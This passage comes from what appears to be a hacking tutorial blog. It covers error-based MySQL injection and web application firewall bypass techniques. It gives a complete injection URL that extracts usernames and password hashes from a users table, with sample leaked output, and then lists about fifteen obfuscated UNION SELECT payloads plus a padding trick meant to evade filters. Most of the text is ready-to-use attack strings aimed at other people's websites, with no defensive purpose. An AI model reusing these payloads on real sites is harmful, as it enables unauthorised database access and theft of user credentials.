1. Now to get all the info from ID number 1 (probably the admin user), we will use the same query but now with more than only “ID”  in the query like this:

   www.example.com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(id,0x3a,username,0x3a,password)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

   Make note that I’m using 0x3a which is hex encoding for the : sign, to keep the query nice and easy to see, the whole query results with this:

   ·         Duplicate entry '1:lammertw:0c5dbe3017f2dc6755933adb45735086~1' for key 'group_key'

   Now as I noted before, remove the ~1 and you got all the info like this:

   ID – Username – Password (Encrypted in MD5(Read back if you don’t remember how to decrypt it).

   Well done, now you have mastered a small proportion of Error based MySQL.

   Posted 24th August 2012 by Nishobdo Pothik

   0
   

   Add a comment

2. 
   

   AUG

   24

   
   

   Waf & Waf Bypassing

   
   

   Let’s explain firstly what WaF stands for and what it actually does for a website / server.

   Waf is short for: Web Application Firewall, its purpose is to filter out a lot of our queries characters.
   
   An example of a normal website we would inject on would look like:

   www.exmample.com/page.php?id=1 and 1=0 union all select 1,2,3,4,5--
   
   If we do that with a WAF protected website will we get thrown out with a 403 FORBIDDEN error, or the 404 not found error.
   
   Now that you know what a WAF is and what it does, I will show you some tip’s / tricks to bypass it.
   
   Comments used to bypass:

   ·         //

   ·         -- 

   ·         /**/

   ·         #

   ·         --+

   ·         -- -

   ·         ;

   ·         -- a
   

   Now for bypassing some WaFs, the exploiting is quite similar to basic SQL injection, yet you have filters now that you have to bypass, here are a few queries that CAN bypass (It’s never 100%).

   ·         page.php?id=1/*!UnIoN*/SeLeCT (In this case we use /! As they are used as inline MySQL comments (sort of php like) and we work with lower case and upper case letters to bypass it as well).

   ·         page.php?id=1+UNIunionON+SeLselectECT+1,2,3,4,5— (In this case we use the double text, its seems rather weird but what it does, if a filter detects the union select, and the filter has preg_replace(php function) to replace our union select with a space (or nothing), it will still show like:

   UNION SELECT 1,2,3,4,5--

   ·         page.php?id=1%252f%252a*/UNION%252f%252a /SELECT (In this case we are using HTTP encoding (hence the %252f etc signs, to DOUBLE bypass certain WAF’S (this method works only on 10-15% of the sites I’ve personally tested on))).

   Putting it all together:www.exmample.com/page.php?id=1 /*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables--

Which will result showing all the table names, just as Chapter 1.

   The rest of the exploiting you have to figure out yourself, I gave you the handles for WAF bypassing, a hacker has to do everything on his own to really master / learn something they want, all this does is tickle your brain.

   Tips & Trick bypassing more:

   1.       id=1+(UnIoN)+(SelECT)+

   2.       id=1+(UnIoN+SeLeCT)+

   3.       id=1+(UnI)(oN)+(SeL)(EcT)

   4.  id=1+'UnI''On'+'SeL''ECT'

   5.  id=1+%55nion all /*!12345%53elect*/ 1,version(),3—

   6.       id=1+UnIoN+SeLecT 1,2,3—

   7.       id=1+UnIOn/**/SeLect 1,2,3—

   8.       id=1+UNIunionON+SELselectECT 1,2,3—

   9.       id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—

   10.   id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—

   11.id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—

   12.id=1+un/**/ion+sel/**/ect+1,2,3--

   13.id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3

   14.id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--

   15.   id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

   
   

   It’s only important to use these queries as weird as they look right now at the start of the query, meaning, the rest of the query you could try normal like:

   www.example.com/page.php?id=1 id=1+(UnIoN)+(SelECT)+1,2,username,4,5 from users--

   
   

   
   

   
   

   
   

   
   

   
   

   
   

   
   

   
   

   The unknown 500 server error bypass.
   A lot of you might not know that 500 server errors fall under WAF bypassing, it’s simply a technique used, we will use a certain amount of characters to bypass the filters.

   Example:

   index.php?id=-1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!UNION*/ /*!SELECT*//**/1,2,3,4,5,6—x

   n  The query looks quite big, the A = 1000x, to bypass common filters.